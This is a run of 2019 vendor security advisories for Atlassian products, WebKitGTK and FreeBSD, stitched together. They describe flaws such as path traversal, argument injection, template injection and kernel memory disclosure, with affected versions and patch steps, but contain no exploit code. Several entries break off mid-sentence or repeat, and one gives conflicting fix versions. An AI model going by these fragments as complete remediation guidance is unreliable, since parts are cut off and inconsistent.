* for 4.3.x, Jira Service Desk Server and Data Center 4.3.5 has been released with a fix for this issue.
* for 4.4.x, Jira Service Desk Server and Data Center 4.4.3 has been released with a fix for this issue.
* for 4.5.x, Jira Service Desk Server and Data Center 4.5.1 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability. Versions of Jira Service Desk Server and Data Center are affected by this vulnerability. Customers who have upgraded Jira Service Desk Server and Data Center to version 3.9.17 or 3.16.11 or 4.2.6 or 4.3.5 or 4.4.3 or 4.5.1 are not affected.

Customers who have downloaded and installed any of the following versions of Jira Service Desk Server and Data Center should upgrade their installations immediately to fix this vulnerability:
* less than 3.9.17 (the fixed version for 3.9.x)
* >= 3.10.0 but less than 3.16.11 (the fixed version for 3.16.x)
* >= 4.0.0 but less than 4.2.6 (the fixed version for 4.2.x)
* >= 4.3.0 but less than 4.3.5 (the fixed version for 4.3.x)
* >= 4.4.0 but less than 4.4.3 (the fixed version for 4.4.x)
* >= 4.5.0 but less than 4.5.1 (the fixed version for 4.5.x)

URL path traversal allows information disclosure - CVE-2019-15003

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
By design, Jira Service Desk gives customer portal users permissions only to raise requests and view issues. This allows users to interact with the customer portal without having direct access to Jira. These restrictions can be bypassed by a remote attacker with portal access who exploits a path traversal vulnerability. Note that attackers can grant themselves access to Jira Service Desk portals that have the "Anyone can email the service desk or raise a request in the portal" setting enabled. Exploitation allows an attacker to view all issues within all Jira projects contained in the vulnerable instance. This could include Jira Service Desk projects, Jira Core projects, and Jira Software projects.

All versions of Jira Service Desk Server and Data Center before 3.9.17 (the fixed version for 3.9.x), from version 3.10.0 before 3.16.10 (the fixed version for 3.16.x), from version 4.0.0 before 4.2.6 (the fixed version for 4.2.x), from version 4.3.0 before 4.3.5 (the fixed version for 4.3.x), from version 4.4.0 before 4.4.3 (the fixed version for 4.4.x), and from version 4.5.0 before 4.5.1 (the fixed version for 4.5.x) are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/JSDSERVER-6589 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Jira Service Desk Server and Data Center version 3.9.17
* Jira Service Desk Server and Data Center version 3.16.11
* Jira Service Desk Server and Data Center version 4.2.6
* Jira Service Desk Server and Data Center version 4.3.5
* Jira Service Desk Server and Data Center version 4.4.3
* Jira Service Desk Server and Data Center version 4.5.1

Remediation:
Upgrade Jira Service Desk Server and Data Center to version 4.5.1 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Jira Service Desk Server and Data Center 3.9.x and cannot upgrade to 4.5.1, upgrade to version 3.9.17. If you are running Jira Service Desk Serv
Security Advisory for Jira Plug-in: In-App & Desktop Notification
CVE-2019-16906
CVE-2019-16907
CVE-2019-16908
CVE-2019-16909

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-041.txt
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-042.txt
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-043.txt
Bitbucket Server security advisory 2019-09-18
This email refers to the advisory found at https://confluence.atlassian.com/x/Czc4Og .

CVE ID:
* CVE-2019-15000.

Product: Bitbucket Server and Bitbucket Data Center.

Affected Bitbucket Server and Bitbucket Data Center product versions:
version < 5.16.10
6.0.0 <= version < 6.0.10
6.1.0 <= version < 6.1.8
6.2.0 <= version < 6.2.6
6.3.0 <= version < 6.3.5
6.4.0 <= version < 6.4.3
6.5.0 <= version < 6.5.2

Fixed Bitbucket Server and Bitbucket Data Center product versions:
* for 5.16.x, Bitbucket Server and Bitbucket Data Center 5.16.10 has been released with a fix for this issue.
* for 6.0.x, Bitbucket Server and Bitbucket Data Center 6.0.10 has been released with a fix for this issue.
* for 6.1.x, Bitbucket Server and Bitbucket Data Center 6.1.8 has been released with a fix for this issue.
* for 6.2.x, Bitbucket Server and Bitbucket Data Center 6.2.6 has been released with a fix for this issue.
* for 6.3.x, Bitbucket Server and Bitbucket Data Center 6.3.5 has been released with a fix for this issue.
* for 6.4.x, Bitbucket Server and Bitbucket Data Center 6.4.3 has been released with a fix for this issue.
* for 6.5.x, Bitbucket Server and Bitbucket Data Center 6.5.2 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability. Versions of Bitbucket Server and Bitbucket Data Center before 5.16.10 (the fixed version for 5.16.x), from version 6.0.0 before 6.0.10 (the fixed version for 6.0.x), from version 6.1.0 before 6.1.8 (the fixed version for 6.1.x), from version 6.2.0 before 6.2.6 (the fixed version for 6.2.x), from version 6.3.0 before 6.3.5 (the fixed version for 6.3.x), from version 6.4.0 before 6.4.3 (the fixed version for 6.4.x), and from version 6.5.0 before 6.5.2 (the fixed version for 6.5.x) are affected by this vulnerability. Customers who have upgraded Bitbucket Server and Bitbucket Data Center to version 5.16.10 or 6.0.10 or 6.1.8 or 6.2.6 or 6.3.5 or 6.4.3 or 6.5.2 or 6.6.0 are not affected.

Customers who have downloaded and installed any of the following versions of Bitbucket Server and Bitbucket Data Center should upgrade their installations immediately to fix this vulnerability:
* less than 5.16.10 (the fixed version for 5.16.x)
* >= 6.0.0 but less than 6.0.10 (the fixed version for 6.0.x)
* >= 6.1.0 but less than 6.1.8 (the fixed version for 6.1.x)
* >= 6.2.0 but less than 6.2.6 (the fixed version for 6.2.x)
* >= 6.3.0 but less than 6.3.5 (the fixed version for 6.3.x)
* >= 6.4.0 but less than 6.4.3 (the fixed version for 6.4.x)
* >= 6.5.0 but less than 6.5.2 (the fixed version for 6.5.x)

Argument Injection - CVE-2019-15000

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
Bitbucket Server and Bitbucket Data Center had an argument injection vulnerability, allowing an attacker to inject additional arguments into Git commands, which could lead to remote code execution. Remote attackers can exploit this argument injection vulnerability if they are able to access a Git repository in Bitbucket Server or Bitbucket Data Center. If public access is enabled for a project or repository, then attackers are able to exploit this issue anonymously.

Versions of Bitbucket Server and Bitbucket Data Center before 5.16.10 (the fixed version for 5.16.x), from version 6.0.0 before 6.0.10 (the fixed version for 6.0.x), from version 6.1.0 before 6.1.8 (the fixed version for 6.1.x), from version 6.2.0 before 6.2.6 (the fixed version for 6.2.x), from version 6.3.0 before 6.3.5 (the fixed version for 6.3.x), from version 6.4.0 before 6.4.3 (the fixed version for 6.4.x), and from version 6.5.0 before 6.5.2 (the fixed version for 6.5.x) are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/BSERV-11947 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Bitbucket Server and Bitbucket Data Center version 5.16.10
* Bitbucket Server and Bitbucket Data Center version 6.0.10
* Bitbucket Server and Bitbucket Data Center version 6.1.8
* Bitbucket Server and Bitbucket Data Center version 6.2.6
* Bitbucket Server
Jira Security Advisory - 2019-09-18 - CVE-2019-15001
This email refers to the advisory found at https://confluence.atlassian.com/x/KkU4Og .

CVE ID:
* CVE-2019-15001.

Product: Jira Server and Data Center.

Affected Jira Server and Data Center product versions:
7.0.10 <= version < 7.6.16
7.7.0 <= version < 7.13.8
8.0.0 <= version < 8.1.3
8.2.0 <= version < 8.2.5
8.3.0 <= version < 8.3.4
8.4.0 <= version < 8.4.1

Fixed Jira Server and Data Center product versions:
* for 7.6.x, Jira Server and Data Center 7.6.16 has been released with a fix for this issue.
* for 7.13.x, Jira Server and Data Center 7.13.8 has been released with a fix for this issue.
* for 8.1.x, Jira Server and Data Center 8.1.3 has been released with a fix for this issue.
* for 8.2.x, Jira Server and Data Center 8.2.5 has been released with a fix for this issue.
* for 8.3.x, Jira Server and Data Center 8.3.4 has been released with a fix for this issue.
* for 8.4.x, Jira Server and Data Center 8.4.1 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability. Versions of Jira Server and Data Center starting with version 7.0.10 before 7.6.16 (the fixed version for 7.6.x), from version 7.7.0 before 7.13.8 (the fixed version for 7.13.x), from version 8.0.0 before 8.1.3 (the fixed version for 8.1.x), from version 8.2.0 before 8.2.5 (the fixed version for 8.2.x), from version 8.3.0 before 8.3.4 (the fixed version for 8.3.x), and from version 8.4.0 before 8.4.1 (the fixed version for 8.4.x) are affected by this vulnerability. Customers who have upgraded Jira Server and Data Center to version 7.6.16 or 7.13.8 or 8.1.3 or 8.2.5 or 8.3.4 or 8.4.1 are not affected.

Customers who have downloaded and installed any of the following versions of Jira Server and Data Center should upgrade their installations immediately to fix this vulnerability:
* >= 7.0.10 but less than 7.6.16 (the fixed version for 7.6.x)
* >= 7.7.0 but less than 7.13.8 (the fixed version for 7.13.x)
* >= 8.0.0 but less than 8.1.3 (the fixed version for 8.1.x)
* >= 8.2.0 but less than 8.2.5 (the fixed version for 8.2.x)
* >= 8.3.0 but less than 8.3.4 (the fixed version for 8.3.x)
* >= 8.4.0 but less than 8.4.1 (the fixed version for 8.4.x)

Template injection in Jira Importers Plugin - CVE-2019-15001

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
There was a server-side template injection vulnerability in Jira Server and Data Center, in the Jira Importers Plugin (JIM). An attacker with "JIRA Administrators" access can exploit this issue. Successful exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center.

Versions of Jira Server and Data Center starting with version 7.0.10 before 7.6.16 (the fixed version for 7.6.x), from version 7.7.0 before 7.13.8 (the fixed version for 7.13.x), from version 8.0.0 before 8.1.3 (the fixed version for 8.1.x), from version 8.2.0 before 8.2.5 (the fixed version for 8.2.x), from version 8.3.0 before 8.3.4 (the fixed version for 8.3.x), and from version 8.4.0 before 8.4.1 (the fixed version for 8.4.x) are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/JRASERVER-69933 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Jira Server and Data Center version 7.6.16
* Jira Server and Data Center version 7.13.8
* Jira Server and Data Center version 8.1.3
* Jira Server and Data Center version 8.2.5
* Jira Server and Data Center version 8.3.4
* Jira Server and Data Center version 8.4.1

Remediation:
Upgrade Jira Server and Data Center to version 8.4.1 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Jira Server and Data Center 7.6.x and cannot upgrade to 8.4.1, upgrade to version 7.6.16. If you are running Jira Server and Data Center 7.13.x and cannot upgrade to 8.4.1, upgrade to version 7.13.8. If you are running Jira Server and Data Center 8.1.x and cannot upgrade to 8.4.1, upgrade to version 8.1.3. If you are running Jira Server and Data Center 8.2.x and cannot upgrade to 8.4.1, upgrade to version 8.2.5. If you are running Jira Server and Data Center
Advisory for Confluence Server Local File Disclosure Vulnerability (CVE-2019-3394)
This email refers to the advisory found at https://confluence.atlassian.com/x/uAsvOg .

CVE ID:
* CVE-2019-3394.

Product: Confluence Server.

Affected Confluence Server product versions:
6.1.0 <= version < 6.6.16
6.7.0 <= version < 6.13.7
6.14.0 <= version < 6.15.8

Fixed Confluence Server product versions:
* Confluence Server 6.6.16 has been released with a fix for this issue.
* Confluence Server 6.13.7 has been released with a fix for this issue.
* Confluence Server 6.15.8 has been released with a fix for this issue.

Summary:
This advisory discloses a critical severity security vulnerability which was introduced in version 6.1.0 of Confluence Server. Versions of Confluence Server and Confluence Data Center starting with 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability. Customers who have upgraded Confluence Server to version 6.6.16 or 6.13.7 or 6.15.8 are not affected.

Customers who have downloaded and installed any of the following versions of Confluence Server should upgrade their installations immediately to fix this vulnerability:
* >= 6.1.0 but less than 6.6.16
* >= 6.7.0 but less than 6.13.7
* >= 6.14.0 but less than 6.15.8

Local File Disclosure Vulnerability - CVE-2019-3394

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
Confluence Server and Data Center had a local file disclosure vulnerability in the page export function. A remote attacker who has Add Page space permission would be able to read arbitrary files in the <install-directory>/confluence/WEB-INF directory, which may contain configuration files used for integrating with other services, potentially leaking credentials, such as LDAP credentials, or other sensitive information. The potential to leak LDAP credentials exists if LDAP credentials are specified in an atlassian-user.xml file, which is a deprecated method for configuring LDAP integration.

This vulnerability was introduced in version 6.1.0 of Confluence Server. Versions of Confluence Server and Confluence Data Center starting with 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-58734 .

Fix:
To address this issue, we've released the following versions containing a fix:
* Confluence Server version 6.6.16
* Confluence Server version 6.13.7
* Confluence Server version 6.15.8

Remediation:
Upgrade Confluence Server to version 6.15.8 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. For a full description of the latest version of Confluence Server, see the release notes found at https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You can download the latest version of Confluence Server from the download centre found at https://www.atlassian.com/software/confluence/download.

Support:
If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/.
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0004
Date reported : August 29, 2019
Advisory ID : WSA-2019-0004
WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0004.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0004.html
CVE identifiers : CVE-2019-8644, CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8690.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2019-8644
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
Credit to G. Geshev working with Trend Micro's Zero Day Initiative.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8649
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
Credit to Sergei Glazunov of Google Project Zero.
Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8658
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
Credit to akayn working with Trend Micro's Zero Day Initiative.
Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved state management.

CVE-2019-8666
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8669
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
Credit to akayn working with Trend Micro's Zero Day Initiative.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8671
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Apple.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8672
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Samuel Groß of Google Project Zero.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8673
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Soyeon Park and Wen Xu of SSLab at Georgia Tech.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8676
Versions affected: WebKitGTK and WPE WebKit before 2.24.3.
Credit to Soyeon Park and Wen Xu of SSLab at Georgia Tech.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8677
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Jihui Lu of Tencent KeenLab.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8678
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
Credit to an anonymous researcher, Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan_h0) of Knownsec, Byron Wai of VX Browser Exploitation.
Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8679 Ve
FreeBSD Security Advisory FreeBSD-SA-19:23.midi [REVISED]
FreeBSD-SA-19:23.midi                                       Security Advisory
                                                          The FreeBSD Project

Topic:          kernel memory disclosure from /dev/midistat

Category:       core
Module:         sound
Announced:      2019-08-20
Credits:        Peter Holm, Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5612

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

0.   Revision history

v1.0  2019-08-20  Initial release.
v1.1  2019-08-21  Updated workaround.

I.   Background

/dev/midistat is a device file which can be read to obtain a human-readable list of the available MIDI-capable devices in the system.

II.  Problem Description

The kernel driver for /dev/midistat implements a handler for read(2). This handler is not thread-safe, and a multi-threaded program can exploit races in the handler to cause it to copy out kernel memory outside the boundaries of midistat's data buffer.

III. Impact

The races allow a program to read kernel memory within a 4GB window centered at midistat's data buffer. The buffer is allocated each time the device is opened, so an attacker is not limited to a static 4GB region of memory. On 32-bit platforms, an attempt to trigger the race may cause a page fault in kernel mode, leading to a panic.

IV.  Workaround

Restrict permissions on /dev/midistat by adding an entry to /etc/devfs.conf and restarting the service:

# echo "perm midistat 0600" >> /etc/devfs.conf
# service devfs restart

Custom kernels without "device sound" are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch
# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc
# gpg --verify midi.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r351264
releng/12.0/                                                      r351260
stable/11/                                                        r351265
releng/11.3/                                                      r351260
releng/11.2/                                                      r351260
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612

The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc
FreeBSD Security Advisory FreeBSD-SA-19:24.mqueuefs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:24.mqueuefs Security Advisory The FreeBSD Project Topic: Reference count overflow in mqueue filesystem 32-bit compat Category: core Module: kernel Announced: 2019-08-20 Credits:Karsten König, Secfault Security Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:45:22 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:51:32 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:46:22 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:51:32 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:51:32 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5603 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. Note: This issue is related to the previously disclosed SA-19:15.mqueuefs. It is another instance of the same bug and as such shares the same CVE. I. Background mqueuefs(5) implements POSIX message queue file system which can be used by processes as a communication mechanism. 'struct file' represents open files, directories, sockets and other entities. II. Problem Description System calls operating on file descriptors obtain a reference to relevant struct file which due to a programming error was not always put back, which in turn could be used to overflow the counter of affected struct file. III. Impact A local user can use this flaw to obtain access to files, directories, sockets, etc., opened by processes owned by other users. If obtained struct file represents a directory from outside of user's jail, it can be used to access files outside of the jail. If the user in question is a jailed root they can obtain root privileges on the host system. IV. Workaround No workaround is available. Note that the mqueuefs file system is not enabled by default. V. 
Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r351255
releng/12.0/                                                      r351261
stable/11/                                                        r351257
releng/11.3/                                                      r351261
releng/11.2/                                                      r351261
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:24.mqueuefs.asc
FreeBSD Security Advisory FreeBSD-SA-19:23.midi
FreeBSD-SA-19:23.midi                                       Security Advisory
                                                          The FreeBSD Project

Topic:          kernel memory disclosure from /dev/midistat

Category:       core
Module:         sound
Announced:      2019-08-20
Credits:        Peter Holm, Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5612

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

/dev/midistat is a device file which can be read to obtain a human-readable
list of the available MIDI-capable devices in the system.

II. Problem Description

The kernel driver for /dev/midistat implements a handler for read(2). This
handler is not thread-safe, and a multi-threaded program can exploit races
in the handler to cause it to copy out kernel memory outside the boundaries
of midistat's data buffer.

III. Impact

The races allow a program to read kernel memory within a 4GB window
centered at midistat's data buffer. The buffer is allocated each time the
device is opened, so an attacker is not limited to a static 4GB region of
memory. On 32-bit platforms, an attempt to trigger the race may cause a
page fault in kernel mode, leading to a panic.

IV. Workaround

No workaround is available. Custom kernels without "device sound" are not
vulnerable.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.
1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch
# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc
# gpg --verify midi.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r351264
releng/12.0/                                                      r351260
stable/11/                                                        r351265
releng/11.3/                                                      r351260
releng/11.2/                                                      r351260
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc
FreeBSD Security Advisory FreeBSD-SA-19:22.mbuf
FreeBSD-SA-19:22.mbuf                                       Security Advisory
                                                          The FreeBSD Project

Topic:          IPv6 remote Denial-of-Service

Category:       kernel
Module:         net
Announced:      2019-08-20
Credits:        Clement Lecigne
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-10 00:01:25 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:49:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-10 00:02:45 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:49:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:49:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5611

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

mbufs are a unit of memory management mostly used in the kernel for network
packets and socket buffers. m_pulldown(9) is a function to arrange the data
in a chain of mbufs.

II. Problem Description

Due to a missing check in the code of m_pulldown(9), the data returned may
not be contiguous as requested by the caller.

III. Impact

Extra checks in the IPv6 code catch the error condition and trigger a
kernel panic, leading to a remote DoS (denial-of-service) attack with
certain Ethernet interfaces. At this point it is unknown if any code paths
other than IPv6 can trigger a similar condition.

IV. Workaround

For the currently known attack vector, systems with IPv6 not enabled are
not vulnerable. On systems with IPv6 active, IPv6 fragmentation may be
disabled, or a firewall can be used to filter out packets with certain or
excessive amounts of extension headers in a first fragment. These rules may
be dependent on the operational needs of each site.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.
1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch.asc
# gpg --verify mbuf.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350828
releng/12.0/                                                      r351259
stable/11/                                                        r350829
releng/11.3/                                                      r351259
releng/11.2/                                                      r351259
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=238787
